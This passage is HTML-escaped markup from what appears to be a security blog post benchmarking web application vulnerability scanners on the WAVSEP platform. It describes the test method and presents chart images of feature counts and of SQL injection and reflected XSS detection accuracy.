dir=&quot;LTR&quot;&gt;&lt;/span&gt;The ability to control and limit the scan to internal or external host (domain/IP).&lt;/div&gt;&lt;div class=&quot;MsoNormal&quot;&gt;The testing procedure of all the tools included the following phases:&lt;/div&gt;&lt;div class=&quot;MsoListParagraphCxSpFirst&quot; style=&quot;text-indent: -18pt;&quot;&gt;&lt;span style=&quot;font-family: Symbol;&quot;&gt;·&lt;span style=&quot;font: 7pt &#39;Times New Roman&#39;;&quot;&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; &lt;/span&gt;&lt;/span&gt;&lt;span dir=&quot;LTR&quot;&gt;&lt;/span&gt;The scanners were all tested against the latest version of &lt;a href=&quot;http://code.google.com/p/wavsep/&quot;&gt;WAVSEP&lt;/a&gt; (v1.0.3), a benchmarking platform designed to assess the detection accuracy of web application scanners. The purpose of WAVSEP’s test cases is to provide a scale for understanding which detection barriers each scanning tool can bypass, and which vulnerability variations can be detected by each tool. The various scanners were tested against the following test cases (GET and POST attack vectors):&lt;/div&gt;&lt;div class=&quot;MsoListParagraphCxSpMiddle&quot; style=&quot;margin-left: 72pt; text-indent: -18pt;&quot;&gt;&lt;span style=&quot;font-family: &#39;Courier New&#39;;&quot;&gt;o&lt;span style=&quot;font: 7pt &#39;Times New Roman&#39;;&quot;&gt;&amp;nbsp;&amp;nbsp; &lt;/span&gt;&lt;/span&gt;&lt;span dir=&quot;LTR&quot;&gt;&lt;/span&gt;&lt;b&gt;66&lt;/b&gt; test cases that were vulnerable to Reflected Cross Site Scripting attacks.&lt;/div&gt;&lt;div class=&quot;MsoListParagraphCxSpMiddle&quot; style=&quot;margin-left: 72pt; text-indent: -18pt;&quot;&gt;&lt;span style=&quot;font-family: &#39;Courier New&#39;;&quot;&gt;o&lt;span style=&quot;font: 7pt &#39;Times New Roman&#39;;&quot;&gt;&amp;nbsp;&amp;nbsp; &lt;/span&gt;&lt;/span&gt;&lt;span dir=&quot;LTR&quot;&gt;&lt;/span&gt;&lt;b&gt;80&lt;/b&gt; test cases that contained Error Disclosing SQL Injection exposures.&lt;/div&gt;&lt;div class=&quot;MsoListParagraphCxSpMiddle&quot; style=&quot;margin-left: 72pt; text-indent: -18pt;&quot;&gt;&lt;span style=&quot;font-family: &#39;Courier New&#39;;&quot;&gt;o&lt;span style=&quot;font: 7pt &#39;Times New Roman&#39;;&quot;&gt;&amp;nbsp;&amp;nbsp; &lt;/span&gt;&lt;/span&gt;&lt;span dir=&quot;LTR&quot;&gt;&lt;/span&gt;&lt;b&gt;46&lt;/b&gt; test cases that contained Blind SQL Injection exposures.&lt;/div&gt;&lt;div class=&quot;MsoListParagraphCxSpMiddle&quot; style=&quot;margin-left: 72pt; text-indent: -18pt;&quot;&gt;&lt;span style=&quot;font-family: &#39;Courier New&#39;;&quot;&gt;o&lt;span style=&quot;font: 7pt &#39;Times New Roman&#39;;&quot;&gt;&amp;nbsp;&amp;nbsp; &lt;/span&gt;&lt;/span&gt;&lt;span dir=&quot;LTR&quot;&gt;&lt;/span&gt;&lt;b&gt;10&lt;/b&gt; test cases that were vulnerable to Time Based SQL Injection attacks.&lt;/div&gt;&lt;div class=&quot;MsoListParagraphCxSpMiddle&quot; style=&quot;margin-left: 72pt; text-indent: -18pt;&quot;&gt;&lt;span style=&quot;font-family: &#39;Courier New&#39;;&quot;&gt;o&lt;span style=&quot;font: 7pt &#39;Times New Roman&#39;;&quot;&gt;&amp;nbsp;&amp;nbsp; &lt;/span&gt;&lt;/span&gt;&lt;span dir=&quot;LTR&quot;&gt;&lt;/span&gt;&lt;b&gt;7&lt;/b&gt; different categories of &lt;b&gt;&lt;i&gt;false positive&lt;/i&gt;&lt;/b&gt; RXSS vulnerabilities.&lt;/div&gt;&lt;div class=&quot;MsoListParagraphCxSpMiddle&quot; style=&quot;margin-left: 72pt; text-indent: -18pt;&quot;&gt;&lt;span style=&quot;font-family: &#39;Courier New&#39;;&quot;&gt;o&lt;span style=&quot;font: 7pt &#39;Times New Roman&#39;;&quot;&gt;&amp;nbsp;&amp;nbsp; &lt;/span&gt;&lt;/span&gt;&lt;span dir=&quot;LTR&quot;&gt;&lt;/span&gt;&lt;b&gt;10&lt;/b&gt; different categories of &lt;b&gt;&lt;i&gt;false positive&lt;/i&gt;&lt;/b&gt; SQLi vulnerabilities.&lt;/div&gt;&lt;div class=&quot;MsoListParagraphCxSpMiddle&quot; style=&quot;text-indent: -18pt;&quot;&gt;&lt;span style=&quot;font-family: Symbol;&quot;&gt;·&lt;span style=&quot;font: 7pt &#39;Times New Roman&#39;;&quot;&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; &lt;/span&gt;&lt;/span&gt;&lt;span dir=&quot;LTR&quot;&gt;&lt;/span&gt;In order to ensure the result consistency, the directory of each exposure sub category was individually scanned multiple times using various configurations.&lt;/div&gt;&lt;div class=&quot;MsoListParagraphCxSpMiddle&quot; style=&quot;text-indent: -18pt;&quot;&gt;&lt;span style=&quot;font-family: Symbol;&quot;&gt;·&lt;span style=&quot;font: 7pt &#39;Times New Roman&#39;;&quot;&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; &lt;/span&gt;&lt;/span&gt;&lt;span dir=&quot;LTR&quot;&gt;&lt;/span&gt;The features of each scanner were documented and compared, according to documentation, configuration, plugins and information received from the vendor.&lt;/div&gt;&lt;div class=&quot;MsoListParagraphCxSpLast&quot; style=&quot;text-indent: -18pt;&quot;&gt;&lt;span style=&quot;font-family: Symbol;&quot;&gt;·&lt;span style=&quot;font: 7pt &#39;Times New Roman&#39;;&quot;&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; &lt;/span&gt;&lt;/span&gt;&lt;span dir=&quot;LTR&quot;&gt;&lt;/span&gt;In order to ensure that the detection features of each scanner were truly effective, most of the scanners were tested against an additional benchmarking application that was prone to the same vulnerable test cases as the WAVSEP platform, but had a different design, slightly different behavior and different entry point format (currently nicknamed &quot;bullshit&quot;). &lt;/div&gt;&lt;div class=&quot;MsoNormal&quot;&gt;The results of the main test categories are presented within three graphs (commercial graph, free &amp;amp; open source graph, unified graph), and the detailed information of each test is presented in a dedicated report. &lt;/div&gt;&lt;div class=&quot;MsoNormal&quot;&gt;So, now that you&#39;ve learned about the testing process, it&#39;s time for the results…&lt;br /&gt;
&amp;nbsp; &lt;/div&gt;&lt;div class=&quot;MsoListParagraph&quot; style=&quot;margin-left: 18pt; text-indent: -18pt;&quot;&gt;&lt;a href=&quot;http://www.blogger.com/post-edit.g?blogID=3792178847867987053&amp;amp;postID=5660944376278622097&quot; name=&quot;_Toc300025792&quot;&gt;&lt;b&gt;&lt;span style=&quot;font-size: 18pt; line-height: 115%;&quot;&gt;4. &lt;/span&gt;&lt;/b&gt;&lt;span dir=&quot;LTR&quot;&gt;&lt;/span&gt;&lt;b&gt;&lt;u&gt;&lt;span style=&quot;font-size: 18pt; line-height: 115%;&quot;&gt;Test I – The More The Merrier – Counting Audit Features&lt;/span&gt;&lt;/u&gt;&lt;/b&gt;&lt;/a&gt;&lt;b&gt;&lt;u&gt;&lt;span style=&quot;font-size: 18pt; line-height: 115%;&quot;&gt;&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/u&gt;&lt;/b&gt;&lt;/div&gt;&lt;div class=&quot;MsoNormal&quot;&gt;The first assessment criterion was the &lt;b&gt;number&lt;/b&gt; of audit features each tool supports.&lt;/div&gt;&lt;div class=&quot;MsoNormal&quot;&gt;&lt;b&gt;Reasoning&lt;/b&gt;: An automated tool can&#39;t detect an exposure that it can&#39;t recognize (at least not directly, and not without manual analysis), and therefore, the number of audit features will affect the amount of exposures that the tool will be able to detect (assuming the audit features are &lt;b&gt;&lt;i&gt;implemented properly&lt;/i&gt;&lt;/b&gt;, that vulnerable &lt;b&gt;&lt;i&gt;entry points will be detected&lt;/i&gt;&lt;/b&gt; and that the tool will &lt;b&gt;&lt;i&gt;manage to scan the vulnerable input vectors&lt;/i&gt;&lt;/b&gt;).&lt;/div&gt;&lt;div class=&quot;MsoNormal&quot;&gt;For the purpose of the benchmark, an audit feature was defined as a &lt;b&gt;common&lt;/b&gt; &lt;b&gt;generic application-level &lt;/b&gt;scanning feature, supporting the detection of exposures which could be used to attack the tested web application, gain access to sensitive assets or attack legitimate clients.&lt;/div&gt;&lt;div class=&quot;MsoNormal&quot;&gt;The definition of the assessment criterion rules out product specific exposures and infrastructure related vulnerabilities, while unique and extremely rare features were documented and presented in a different section of this research, and were not taken into account when calculating the results. Exposures that were specific to Flash/Applet/Silverlight and Web Services Assessment were treated in the same manner. &lt;/div&gt;&lt;div class=&quot;MsoNormal&quot;&gt;&lt;br /&gt;
&lt;/div&gt;&lt;div class=&quot;MsoNormal&quot;&gt;&lt;b&gt;&lt;u&gt;The Number of Audit Features in Web Application Scanners – Commercial Tools&lt;o:p&gt;&lt;/o:p&gt;&lt;/u&gt;&lt;/b&gt;&lt;/div&gt;&lt;div class=&quot;MsoNormal&quot;&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;&lt;/div&gt;&lt;br /&gt;
&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi4vupTy7vzj4RmGrUau4i7_lW3jZ4SxXnZRlBR1bhfvVxuXVn_dlqELP3MIOQDNYALeInhj7-PEK-fAURzmv1F1Rb5SXN7CZXWst_WX4i3oZj2baQHtndS_EbFjhsPKxi-fpT9laMRhQ4/s1600/FeatureCount-Commercial.PNG&quot; imageanchor=&quot;1&quot; style=&quot;margin-left: 1em; margin-right: 1em;&quot;&gt;&lt;img border=&quot;0&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi4vupTy7vzj4RmGrUau4i7_lW3jZ4SxXnZRlBR1bhfvVxuXVn_dlqELP3MIOQDNYALeInhj7-PEK-fAURzmv1F1Rb5SXN7CZXWst_WX4i3oZj2baQHtndS_EbFjhsPKxi-fpT9laMRhQ4/s1600/FeatureCount-Commercial.PNG&quot; /&gt;&lt;/a&gt;&lt;/div&gt;&lt;br /&gt;
&lt;/div&gt;&lt;div class=&quot;MsoNormal&quot;&gt;&lt;br /&gt;
&lt;/div&gt;&lt;div class=&quot;MsoNormal&quot;&gt;&lt;b&gt;&lt;u&gt;The Number of Audit Features in Web Application Scanners - Free &amp;amp; Open Source Tools&lt;o:p&gt;&lt;/o:p&gt;&lt;/u&gt;&lt;/b&gt;&lt;/div&gt;&lt;div class=&quot;MsoNormal&quot;&gt;&lt;/div&gt;&lt;div class=&quot;MsoNormal&quot;&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;&lt;/div&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjzmCSGvc14-eT4vExbJ8ary_MIRjkDis-IWrMoOy68-Huc4IPfP9L3EvLGNiq0YQldXhp6bL2lTRzkPRFjzy0-Q1OfRPhnrWOvn4PMan3BLjOSrAHQJYUN_REe6d1vj6mc99vQ3Be_Jxg/s1600/FeatureCount-OpenSourceAndFree.PNG&quot; imageanchor=&quot;1&quot; style=&quot;margin-left: 1em; margin-right: 1em;&quot;&gt;&lt;img border=&quot;0&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjzmCSGvc14-eT4vExbJ8ary_MIRjkDis-IWrMoOy68-Huc4IPfP9L3EvLGNiq0YQldXhp6bL2lTRzkPRFjzy0-Q1OfRPhnrWOvn4PMan3BLjOSrAHQJYUN_REe6d1vj6mc99vQ3Be_Jxg/s1600/FeatureCount-OpenSourceAndFree.PNG&quot; /&gt;&lt;/a&gt;&lt;/div&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;/div&gt;&lt;div class=&quot;MsoNormal&quot;&gt;&lt;b&gt;&lt;u&gt;The Number of Audit Features in Web Application Scanners – Unified List&lt;o:p&gt;&lt;/o:p&gt;&lt;/u&gt;&lt;/b&gt;&lt;/div&gt;&lt;div class=&quot;MsoNormal&quot;&gt;&lt;/div&gt;&lt;div class=&quot;MsoNormal&quot;&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;&lt;/div&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgJs6YmT9wb0FZlvpOfH7v2OW2FIyV3mWinPqMv0ZF4HMplUaZfDTpM5eUH1dtlfnShYamLNjXFSkgc1iHTN6bN5uJI23gwLZ87r0wnLe8U14_rq5KaHx408WfZoUn6HkKY4CTKCBhN-GM/s1600/FeatureCount-Unified.PNG&quot; imageanchor=&quot;1&quot; style=&quot;margin-left: 1em; margin-right: 1em;&quot;&gt;&lt;img border=&quot;0&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgJs6YmT9wb0FZlvpOfH7v2OW2FIyV3mWinPqMv0ZF4HMplUaZfDTpM5eUH1dtlfnShYamLNjXFSkgc1iHTN6bN5uJI23gwLZ87r0wnLe8U14_rq5KaHx408WfZoUn6HkKY4CTKCBhN-GM/s1600/FeatureCount-Unified.PNG&quot; /&gt;&lt;/a&gt;&lt;/div&gt;&lt;br /&gt;
&lt;br /&gt;
So, now that were done with the quantity, let&#39;s get to the quality…&lt;/div&gt;&lt;div class=&quot;MsoNormal&quot;&gt;&lt;br /&gt;
&lt;/div&gt;&lt;div class=&quot;MsoListParagraph&quot; style=&quot;margin-left: 18pt; text-indent: -18pt;&quot;&gt;&lt;a href=&quot;http://www.blogger.com/post-edit.g?blogID=3792178847867987053&amp;amp;postID=5660944376278622097&quot; name=&quot;_Toc300025793&quot;&gt;&lt;b&gt;&lt;span style=&quot;font-size: 18pt; line-height: 115%;&quot;&gt;5. &lt;/span&gt;&lt;/b&gt;&lt;span dir=&quot;LTR&quot;&gt;&lt;/span&gt;&lt;b&gt;&lt;u&gt;&lt;span style=&quot;font-size: 18pt; line-height: 115%;&quot;&gt;Test II – To the Victor Go the Spoils – SQL Injection&lt;/span&gt;&lt;/u&gt;&lt;/b&gt;&lt;/a&gt;&lt;b&gt;&lt;u&gt;&lt;span style=&quot;font-size: 18pt; line-height: 115%;&quot;&gt;&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/u&gt;&lt;/b&gt;&lt;/div&gt;&lt;div class=&quot;MsoNormal&quot;&gt;The second assessment criterion was the detection accuracy of SQL Injection, one of the most famous exposures and the most commonly implemented attack vector in web application scanners.&lt;/div&gt;&lt;div class=&quot;MsoNormal&quot;&gt;&lt;b&gt;Reasoning&lt;/b&gt;: a scanner that is not accurate enough will miss many exposures, and classify non-vulnerable entry points as vulnerable. This test aims to assess how good is each tool at detecting SQL Injection exposures in a&lt;b&gt; supported input vector, &lt;/b&gt;which is located in&lt;b&gt; a known entry point&lt;/b&gt;, without any restrictions that can prevent the tool from operating properly.&lt;/div&gt;&lt;div class=&quot;MsoNormal&quot;&gt;The evaluation was performed on an application that uses MySQL 5.5.x as its data repository, and thus, will reflect the detection accuracy of the tool when scanning similar data repositories.&lt;/div&gt;&lt;div class=&quot;MsoNormal&quot;&gt;&lt;b&gt;&lt;u&gt;Result Chart Glossary&lt;o:p&gt;&lt;/o:p&gt;&lt;/u&gt;&lt;/b&gt;&lt;/div&gt;&lt;div class=&quot;MsoNormal&quot;&gt;Note that the &lt;b&gt;&lt;span style=&quot;color: #0070c0;&quot;&gt;BLUE&lt;/span&gt;&lt;/b&gt; bar represents the vulnerable test case detection accuracy, while the &lt;b&gt;&lt;span style=&quot;color: red;&quot;&gt;RED&lt;/span&gt; &lt;/b&gt;bar represents false positive &lt;u&gt;categories&lt;/u&gt; detected by the tool (which may result in more instances then what the bar actually presents, when compared to the detection accuracy bar).&lt;/div&gt;&lt;div class=&quot;MsoNormal&quot;&gt;&lt;br /&gt;
&lt;/div&gt;&lt;div class=&quot;MsoNormal&quot;&gt;&lt;b&gt;&lt;u&gt;The SQL Injection Detection Accuracy of Web Application Scanners – Commercial Tools&lt;o:p&gt;&lt;/o:p&gt;&lt;/u&gt;&lt;/b&gt;&lt;br /&gt;
&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjHxc1wwEXSFD91uCZBaxrH_1yNVO3-YckiWORcvQbT-QHsDiYyfrl5i2Mj_I_v3YKI5yVSmhunZDLBAJvOqqeMJggOdQHlA-UIMXtUeRY7WX5clxZi1ZaDEB3bMu9laoVX_CeeN7EjA5w/s1600/SQLi-Commercial.PNG&quot; imageanchor=&quot;1&quot; style=&quot;margin-left: 1em; margin-right: 1em;&quot;&gt;&lt;img border=&quot;0&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjHxc1wwEXSFD91uCZBaxrH_1yNVO3-YckiWORcvQbT-QHsDiYyfrl5i2Mj_I_v3YKI5yVSmhunZDLBAJvOqqeMJggOdQHlA-UIMXtUeRY7WX5clxZi1ZaDEB3bMu9laoVX_CeeN7EjA5w/s1600/SQLi-Commercial.PNG&quot; /&gt;&lt;/a&gt;&lt;/div&gt;&lt;b&gt;&lt;u&gt;&lt;br /&gt;
&lt;/u&gt;&lt;/b&gt;&lt;br /&gt;
&lt;b&gt;&lt;u&gt;&lt;br /&gt;
&lt;/u&gt;&lt;/b&gt;&lt;/div&gt;&lt;div class=&quot;MsoNormal&quot;&gt;&lt;/div&gt;&lt;div class=&quot;MsoNormal&quot;&gt;&lt;b&gt;&lt;u&gt;The SQL Injection Detection Accuracy of Web Application Scanners – Open Source &amp;amp; Free Tools&lt;o:p&gt;&lt;/o:p&gt;&lt;/u&gt;&lt;/b&gt;&lt;/div&gt;&lt;div class=&quot;MsoNormal&quot;&gt;&lt;/div&gt;&lt;div class=&quot;MsoNormal&quot;&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;&lt;/div&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;&lt;/div&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjX2-sWel8vztkuph4Zjgib2AnUAvsDJHUHhXJnYlwGsYnXuoGxWNMlsr2Wzlve_k3O52ltV44Lobuw0E71EAaWPpCy2iniLFaJF_eDxDQSdmAwobohL8FBufSTOLmlpmMU7bKNYftwRY8/s1600/SQLi-OpenSourceAndFree.PNG&quot; imageanchor=&quot;1&quot; style=&quot;margin-left: 1em; margin-right: 1em;&quot;&gt;&lt;img border=&quot;0&quot; height=&quot;640&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjX2-sWel8vztkuph4Zjgib2AnUAvsDJHUHhXJnYlwGsYnXuoGxWNMlsr2Wzlve_k3O52ltV44Lobuw0E71EAaWPpCy2iniLFaJF_eDxDQSdmAwobohL8FBufSTOLmlpmMU7bKNYftwRY8/s640/SQLi-OpenSourceAndFree.PNG&quot; width=&quot;554&quot; /&gt;&lt;/a&gt;&lt;/div&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;/div&gt;&lt;div class=&quot;MsoNormal&quot;&gt;&lt;b&gt;&lt;u&gt;The SQL Injection Detection Accuracy of Web Application Scanners – Unified List&lt;o:p&gt;&lt;/o:p&gt;&lt;/u&gt;&lt;/b&gt;&lt;/div&gt;&lt;div class=&quot;MsoNormal&quot;&gt;&lt;/div&gt;&lt;div class=&quot;MsoNormal&quot;&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhOdNLhXMFZYa8PBVRiicCaAvhuDajPoNtvDN-pDsEmlMBCyxrmgqXLKcg8v_B6zPoq-J7oWnYBMFsP7GnnCF3AOuWxBl9olPHYn8uqRiTga3E93Z_o-eFFVWQLHoQWrIKaabNhqIwO8e8/s1600/SQLi-Unified.PNG&quot; imageanchor=&quot;1&quot; style=&quot;margin-left: 1em; margin-right: 1em;&quot;&gt;&lt;img border=&quot;0&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhOdNLhXMFZYa8PBVRiicCaAvhuDajPoNtvDN-pDsEmlMBCyxrmgqXLKcg8v_B6zPoq-J7oWnYBMFsP7GnnCF3AOuWxBl9olPHYn8uqRiTga3E93Z_o-eFFVWQLHoQWrIKaabNhqIwO8e8/s1600/SQLi-Unified.PNG&quot; /&gt;&lt;/a&gt;&lt;/div&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;/div&gt;&lt;div class=&quot;MsoNormal&quot;&gt;It&#39;s obvious that testing one feature is not enough; ideally, the detection accuracy of all audit features should be assessed, but in the meantime, we will settle for one more…&lt;/div&gt;&lt;div class=&quot;MsoNormal&quot;&gt;&lt;br /&gt;
&lt;/div&gt;&lt;div class=&quot;MsoListParagraph&quot; style=&quot;margin-left: 18pt; text-indent: -18pt;&quot;&gt;&lt;a href=&quot;http://www.blogger.com/post-edit.g?blogID=3792178847867987053&amp;amp;postID=5660944376278622097&quot; name=&quot;_Toc300025794&quot;&gt;&lt;b&gt;&lt;span style=&quot;font-size: 18pt; line-height: 115%;&quot;&gt;6. &lt;/span&gt;&lt;/b&gt;&lt;span dir=&quot;LTR&quot;&gt;&lt;/span&gt;&lt;b&gt;&lt;u&gt;&lt;span style=&quot;font-size: 18pt; line-height: 115%;&quot;&gt;Test III – I Fight (For) the Users – Reflected XSS&lt;/span&gt;&lt;/u&gt;&lt;/b&gt;&lt;/a&gt;&lt;b&gt;&lt;u&gt;&lt;span style=&quot;font-size: 18pt; line-height: 115%;&quot;&gt;&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/u&gt;&lt;/b&gt;&lt;/div&gt;&lt;div class=&quot;MsoNormal&quot;&gt;The third assessment criterion was the detection accuracy of Reflected Cross Site Scripting, a common exposure which is the 2nd most commonly implemented feature in web application scanners.&lt;/div&gt;&lt;div class=&quot;MsoNormal&quot;&gt;&lt;b&gt;&lt;u&gt;Result Chart Glossary&lt;o:p&gt;&lt;/o:p&gt;&lt;/u&gt;&lt;/b&gt;&lt;/div&gt;&lt;div class=&quot;MsoNormal&quot;&gt;Note that the &lt;b&gt;&lt;span style=&quot;color: #0070c0;&quot;&gt;BLUE&lt;/span&gt;&lt;/b&gt; bar represents the vulnerable test case detection accuracy, while the &lt;b&gt;&lt;span style=&quot;color: red;&quot;&gt;RED&lt;/span&gt; &lt;/b&gt;bar represents false positive &lt;u&gt;categories&lt;/u&gt; detected by the tool (which may result in more instances then what the bar actually presents, when compared to the detection accuracy bar).&lt;/div&gt;&lt;div class=&quot;MsoNormal&quot;&gt;&lt;br /&gt;
&lt;/div&gt;&lt;div class=&quot;MsoNormal&quot;&gt;&lt;b&gt;&lt;u&gt;The Reflected XSS Detection Accuracy of Web Application Scanners – Commercial Tools&lt;o:p&gt;&lt;/o:p&gt;&lt;/u&gt;&lt;/b&gt;&lt;/div&gt;&lt;div class=&quot;MsoNormal&quot;&gt;&lt;/div&gt;&lt;div class=&quot;MsoNormal&quot;&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgS7FnQu6s0G8oJ8guc75luoxS6RzWCn6a-dOPW_7DcL660TTxXZ8lhyvSPVo5LLzC5LS41K0i7rr6foPisUUlxEQgmGxpHB_Vgj8uOFL0ynDDBgehY23fQHK3lTIV3vccAoujonZrTxS4/s1600/RXSS-Commercial.PNG&quot; imageanchor=&quot;1&quot; style=&quot;margin-left: 1em; margin-right: 1em;&quot;&gt;&lt;img border=&quot;0&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgS7FnQu6s0G8oJ8guc75luoxS6RzWCn6a-dOPW_7DcL660TTxXZ8lhyvSPVo5LLzC5LS41K0i7rr6foPisUUlxEQgmGxpHB_Vgj8uOFL0ynDDBgehY23fQHK3lTIV3vccAoujonZrTxS4/s1600/RXSS-Commercial.PNG&quot; /&gt;&lt;/a&gt;&lt;/div&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;/div&gt;&lt;div class=&quot;MsoNormal&quot;&gt;&lt;b&gt;&lt;u&gt;The Reflected XSS Detection Accuracy of Web Application Scanners – Open Source &amp;amp; Free Tools&lt;o:p&gt;&lt;/o:p&gt;&lt;/u&gt;&lt;/b&gt;&lt;/div&gt;&lt;div class=&quot;MsoNormal&quot;&gt;&lt;/div&gt;&lt;div class=&quot;MsoNormal&quot;&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiDz5EGxDj39zz3Ov0ytpiIva379ENHBI3ZqFNXcSJrR4hQ2bJ-Zl7VKSsL3IoETObFX92kARri6jwKFwAzeIcNOW-KWIjvuFV6UFb1v2gx9oGKwZk0HqaiW0MpaLY8tKfJ-PQ8VAilhmI/s1600/RXSS-OpenSourceAndFree.PNG&quot; imageanchor=&quot;1&quot; style=&quot;margin-left: 1em; margin-right: 1em;&quot;&gt;&lt;img border=&quot;0&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiDz5EGxDj39zz3Ov0ytpiIva379ENHBI3ZqFNXcSJrR4hQ2bJ-Zl7VKSsL3IoETObFX92kARri6jwKFwAzeIcNOW-KWIjvuFV6UFb1v2gx9oGKwZk0HqaiW0MpaLY8tKfJ-PQ8VAilhmI/s1600/RXSS-OpenSourceAndFree.PNG&quot; /&gt;&lt;/a&gt;&lt;/div&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;/div&gt;&lt;div class=&quot;MsoNormal&quot;&gt;&lt;b&gt;&lt;u&gt;The Reflected XSS Detection Accuracy of Web Application Scanners – Unified List&lt;o:p&gt;&lt;/o:p&gt;&lt;/u&gt;&lt;/b&gt;&lt;/div&gt;&lt;div class=&quot;MsoNormal&quot;&gt;&lt;/div&gt;&lt;div class=&quot;MsoNormal&quot;&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh9_jjNMfQCOCPlndZIOkV1OpB1mo-7qrakrEhE8q_RbKQMUWwB2BbpAuw3jbie1cAvf20Qi62VdqauMNLfq_ZF1zgIPRNZLsgg9YM4_KJXZbFPuCcp90acIHSZzPBF_TLE3J6h3Iti8c0/s1600/RXSS-Unified.PNG&quot; imageanchor=&quot;1&quot; style=&quot;margin-left: 1em; margin-right: 1em;&quot;&gt;&lt;img border=&quot;0&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh9_jjNMfQCOCPlndZIOkV1OpB1mo-7qrakrEhE8q_RbKQMUWwB2BbpAuw3jbie1cAvf20Qi62VdqauMNLfq_ZF1zgIPRNZLsgg9YM4_KJXZbFPuCcp90acIHSZzPBF_TLE3J6h3Iti8c0/s1600/RXSS-Unified.PNG&quot; /&gt;&lt;/a&gt;&lt;/div&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;/div&gt;&lt;div class=&quot;MsoListParagraph&quot; style=&quot;margin-left: 18pt; text-indent: -18pt;&quot;&gt;&lt;a href=&quot;http://www.blogger.com/post-edit.g?blogID=3792178847867987053&amp;amp;postID=5660944376278622097&quot; name=&quot;_Toc300025795&quot;&gt;&lt;b&gt;&lt;span style=&quot;font-size: 18pt; line-height: 115%;&quot;&gt;7. &lt;/span&gt;&lt;/b&gt;&lt;span dir=&quot;LTR&quot;&gt;&lt;/span&gt;&lt;b&gt;&lt;u&gt;&lt;span style=&quot;font-size: 18pt; line-height: 115%;&quot;&gt;Test IV – Knowledge is Power - Feature Comparison&lt;/span&gt;&lt;/u&gt;&lt;/b&gt;&lt;/a&gt;&lt;b&gt;&lt;u&gt;&lt;span style=&quot;font-size: 18pt; line-height: 115%;&quot;&gt;&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/u&gt;&lt;/b&gt;&lt;/div&gt;&lt;div class=&quot;MsoNormal&quot;&gt;The list of tools tested in this benchmark is organized within the following reports:&lt;/div&gt;&lt;div class=&quot;MsoListParagraphCxSpFirst&quot; style=&quot;text-indent: -18pt;&quot;&gt;&lt;span style=&quot;font-family: Symbol;&quot;&gt;·&lt;span style=&quot;font: 7pt &#39;Times New Roman&#39;;&quot;&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; &lt;/span&gt;&lt;/span&gt;&lt;span dir=&quot;LTR&quot;&gt;&lt;/span&gt;&lt;a href=&quot;http://sectooladdict-benchmarks.googlecode.com/files/List%20of%20Tested%20Web%20Application%20Vulnerability%20Scanners%20-%20WAVSEP%20Benchmark%202011.pdf&quot;&gt;&lt;b&gt;List of Tested 